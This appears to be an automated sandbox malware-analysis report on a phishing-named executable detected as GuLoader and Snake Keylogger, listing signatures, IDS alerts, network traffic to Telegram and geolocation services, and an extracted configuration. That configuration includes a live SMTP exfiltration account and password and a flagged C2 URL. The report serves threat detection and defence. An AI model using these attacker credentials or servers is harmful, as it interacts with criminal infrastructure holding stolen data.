Edit tour

Windows Analysis Report
FedEx Shipping Confirmation.exe

Overview

General Information

Sample name:	FedEx Shipping Confirmation.exe
Analysis ID:	1499874
MD5:	f48ad078b3b7bec3ef37e33619dbe943
SHA1:	3f13e731e2819f3032bf6514cd72c0d68eae13bc
SHA256:	5c165586ed7a8f62f8d8fe850d874ede748092d4dbf54667ce8b02b4081c4cfe
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

FedEx Shipping Confirmation.exe (PID: 2252 cmdline: "C:\Users\user\Desktop\FedEx Shipping Confirmation.exe" MD5: F48AD078B3B7BEC3EF37E33619DBE943)

FedEx Shipping Confirmation.exe (PID: 3660 cmdline: "C:\Users\user\Desktop\FedEx Shipping Confirmation.exe" MD5: F48AD078B3B7BEC3EF37E33619DBE943)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "logbox4@novaoil.top", "Password": "7213575aceACE@", "Host": "novaoil.top", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.3333461569.0000000004B3F000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: FedEx Shipping Confirmation.exe PID: 3660	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FedEx Shipping Confirmation.exe PID: 3660	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 193.122.6.168

Timestamp:	2024-08-27T18:04:57.946926+0200
SID:	2803274
Severity:	2
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 104.21.67.152

Timestamp:	2024-08-27T18:04:58.376289+0200
SID:	2803305
Severity:	3
Source Port:	49803
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 104.21.67.152

Timestamp:	2024-08-27T18:04:57.035724+0200
SID:	2803305
Severity:	3
Source Port:	49801
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 193.122.6.168

Timestamp:	2024-08-27T18:04:52.901049+0200
SID:	2803274
Severity:	2
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 104.21.67.152

Timestamp:	2024-08-27T18:04:59.067006+0200
SID:	2803305
Severity:	3
Source Port:	49804
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 104.21.67.152

Timestamp:	2024-08-27T18:04:57.711172+0200
SID:	2803305
Severity:	3
Source Port:	49802
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 104.21.67.152

Timestamp:	2024-08-27T18:04:55.009751+0200
SID:	2803305
Severity:	3
Source Port:	49798
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 104.21.67.152

Timestamp:	2024-08-27T18:04:56.340136+0200
SID:	2803305
Severity:	3
Source Port:	49800
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 193.122.6.168

Timestamp:	2024-08-27T18:04:55.916109+0200
SID:	2803274
Severity:	2
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 193.122.6.168

Timestamp:	2024-08-27T18:04:54.572636+0200
SID:	2803274
Severity:	2
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 193.122.6.168

Timestamp:	2024-08-27T18:04:58.618537+0200
SID:	2803274
Severity:	2
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 193.122.6.168

Timestamp:	2024-08-27T18:04:59.305896+0200
SID:	2803274
Severity:	2
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 104.21.67.152

Timestamp:	2024-08-27T18:04:55.672397+0200
SID:	2803305
Severity:	3
Source Port:	49799
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 193.122.6.168

Timestamp:	2024-08-27T18:04:55.244292+0200
SID:	2803274
Severity:	2
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 104.21.67.152

Timestamp:	2024-08-27T18:04:59.749930+0200
SID:	2803305
Severity:	3
Source Port:	49805
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 104.153.208.178

Timestamp:	2024-08-27T18:04:50.784846+0200
SID:	2803270
Severity:	2
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 193.122.6.168

Timestamp:	2024-08-27T18:04:56.587786+0200
SID:	2803274
Severity:	2
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 193.122.6.168

Timestamp:	2024-08-27T18:04:57.275179+0200
SID:	2803274
Severity:	2
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://anotherarmy.dns.army:8081

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logbox4@novaoil.top", "Password": "7213575aceACE@", "Host": "novaoil.top", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: FedEx Shipping Confirmation.exe

ReversingLabs: Detection: 26%

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: FedEx Shipping Confirmation.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49797 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49806 version: TLS 1.2

Source: FedEx Shipping Confirmation.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: FedEx Shipping Confirmation.exe, 00000003.00000002.8130208151.0000000070C5B000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: FedEx Shipping Confirmation.exe, 00000003.00000002.8130208151.0000000070C5B000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Drawing.pdb source: FedEx Shipping Confirmation.exe, 00000003.00000002.8133506250.0000000070E3B000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: FedEx Shipping Confirmation.exe, 00000003.00000002.8130208151.0000000070C5B000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: FedEx Shipping Confirmation.exe, 00000003.00000002.8133506250.0000000070E3B000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: FedEx Shipping Confirmation.exe, 00000003.00000002.8133506250.0000000070E3B000.00000020.00000001.01000000.0000000D.sdmp

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 1_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		1_2_00405C60
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 1_2_004068B1 FindFirstFileW,FindClose,		1_2_004068B1

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_0011F048
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_0011F67B
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_0011F85B
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 358E2870h	3_2_358E2458
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 358E2131h	3_2_358E1E80
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 358E021Dh	3_2_358E0040
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 358E0BA7h	3_2_358E0040
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then mov esp, ebp	3_2_358EECC8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 358E2870h	3_2_358E279E
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 358EF207h	3_2_358EEF60
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 358EFAB7h	3_2_358EF810
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 358EF65Fh	3_2_358EF3B8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B18E49h	3_2_35B18BA0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1A5CBh	3_2_35B1A290
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B12E57h	3_2_35B12BB0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B13B5Fh	3_2_35B138B8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1C287h	3_2_35B1BFB8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B11447h	3_2_35B111A0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1214Fh	3_2_35B11EA8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1E277h	3_2_35B1DFA8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B17437h	3_2_35B17190
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1073Fh	3_2_35B10498
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1813Fh	3_2_35B17E98
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1B967h	3_2_35B1B698
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1D957h	3_2_35B1D688
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1982Fh	3_2_35B19588
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B10B97h	3_2_35B108F0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B18597h	3_2_35B182F0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1D4C7h	3_2_35B1D1F8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1189Fh	3_2_35B115F8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B19C87h	3_2_35B199E0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1788Fh	3_2_35B175E8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1ABB7h	3_2_35B1A8E8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1F4B7h	3_2_35B1F1E8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1CBA7h	3_2_35B1C8D8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B14867h	3_2_35B145C0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1556Fh	3_2_35B152C8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1EB97h	3_2_35B1E8C8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B193D7h	3_2_35B19130
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B16FDFh	3_2_35B16D38
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1A0DFh	3_2_35B19E38
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1E707h	3_2_35B1E438
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B159C7h	3_2_35B15720
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1BDF7h	3_2_35B1BB28
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B13FB7h	3_2_35B13D10
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1DDE7h	3_2_35B1DB18
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B14CBFh	3_2_35B14A18
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B125A7h	3_2_35B12300
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B132AFh	3_2_35B13008
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1B4D7h	3_2_35B1B208
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1FDD7h	3_2_35B1FB08
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B15117h	3_2_35B14E70
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1F947h	3_2_35B1F678
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B15E1Fh	3_2_35B15B78
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1B047h	3_2_35B1AD78
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B13707h	3_2_35B13460
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1D037h	3_2_35B1CD68
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1440Fh	3_2_35B14168
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B11CF7h	3_2_35B11A50
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B129FFh	3_2_35B12758
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1F027h	3_2_35B1ED58
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B102E7h	3_2_35B10040
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B17CE7h	3_2_35B17A40
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B10FEFh	3_2_35B10D48
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B189EFh	3_2_35B18748
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B1C717h	3_2_35B1C448
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4E170h	3_2_35B4DE78
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B40C2Fh	3_2_35B40960
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B46058h	3_2_35B45D60
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4DCA8h	3_2_35B4D9B0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B45A28h	3_2_35B456B8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B46EB0h	3_2_35B46BB8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B48698h	3_2_35B483A0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B43077h	3_2_35B42DA8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4B1A0h	3_2_35B4AEA8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4C988h	3_2_35B4C690
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B45067h	3_2_35B44D98
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4F490h	3_2_35B4F198
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B41527h	3_2_35B41280
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B47378h	3_2_35B47080
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B42757h	3_2_35B42488
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B49E80h	3_2_35B49B88
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B410BFh	3_2_35B40DF0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B469E8h	3_2_35B466F0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B422C7h	3_2_35B41FF8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B494F0h	3_2_35B491F8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4ACD8h	3_2_35B4A9E0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B442B8h	3_2_35B43FE8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4D7E0h	3_2_35B4D4E8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4079Fh	3_2_35B404D0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4EFC8h	3_2_35B4ECD0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B419A7h	3_2_35B416D8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B481D0h	3_2_35B47ED8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B499B8h	3_2_35B496C0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B43997h	3_2_35B436C8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4C4C0h	3_2_35B4C1C8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B49028h	3_2_35B48D30
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B43507h	3_2_35B43238
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4BB30h	3_2_35B4B838
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4D318h	3_2_35B4D020
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B454F7h	3_2_35B45228
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B46520h	3_2_35B46228
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B47D08h	3_2_35B47A10
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B42BE7h	3_2_35B42918
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4A810h	3_2_35B4A518
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4BFF8h	3_2_35B4BD00
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B44BD7h	3_2_35B44908
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4EB00h	3_2_35B4E808
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4B668h	3_2_35B4B370
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B44747h	3_2_35B44478
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4F958h	3_2_35B4F660
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B41E37h	3_2_35B41B68
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B48B60h	3_2_35B48868
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4A348h	3_2_35B4A050
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B43E27h	3_2_35B43B58
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4CE50h	3_2_35B4CB58
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4030Fh	3_2_35B40040
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B4E638h	3_2_35B4E340
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B47840h	3_2_35B47548
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B61B20h	3_2_35B61828
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B60CC8h	3_2_35B609D0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B60800h	3_2_35B60508
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B61658h	3_2_35B61360
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B61190h	3_2_35B60E98
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 4x nop then jmp 35B60339h	3_2_35B60040

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
